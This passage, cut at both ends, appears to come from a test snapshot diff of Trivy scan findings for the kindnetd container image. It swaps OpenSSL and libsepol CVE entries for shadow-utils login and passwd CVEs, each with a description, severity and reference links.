is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36087", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36087", - }, - { - "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://avd.aquasec.com/nvd/cve-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://access.redhat.com/security/cve/CVE-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/shadow-maint/shadow/pull/97", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://security.gentoo.org/glsa/201805-09", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://ubuntu.com/security/notices/USN-5254-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.5-1.1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1292", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-1292", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", - "https://linux.oracle.com/cve/CVE-2022-1292.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", - "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220602-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://ubuntu.com/security/notices/USN-5402-1", - "https://ubuntu.com/security/notices/USN-5402-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1292", - "https://www.debian.org/security/2022/dsa-5139", - "https://www.openssl.org/news/secadv/20220503.txt", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", ], }, "category": "Vulnerability", - "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "c_rehash script allows command injection", + "name": "Improper input validation in shadow-utils package utility chfn", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1292", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://issues.rpath.com/browse/RPL-1825", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-2", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5139", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220503.txt", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2068", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-7169", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2068", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", - "https://linux.oracle.com/cve/CVE-2022-2068.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - "https://security.netapp.com/advisory/ntap-20220707-0008/", - "https://ubuntu.com/security/notices/USN-5488-1", - "https://ubuntu.com/security/notices/USN-5488-2", - "https://www.cve.org/CVERecord?id=CVE-2022-2068", - "https://www.debian.org/security/2022/dsa-5169", - "https://www.openssl.org/news/secadv/20220621.txt", + "https://access.redhat.com/security/cve/CVE-2018-7169", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "https://github.com/shadow-maint/shadow/pull/97", + "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "https://security.gentoo.org/glsa/201805-09", + "https://ubuntu.com/security/notices/USN-5254-1", + "https://www.cve.org/CVERecord?id=CVE-2018-7169", ], }, "category": "Vulnerability", - "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "the c_rehash script allows command injection", + "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2068", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://avd.aquasec.com/nvd/cve-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://access.redhat.com/security/cve/CVE-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://github.com/shadow-maint/shadow/pull/97", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://security.gentoo.org/glsa/201805-09", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://ubuntu.com/security/notices/USN-5254-1", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": 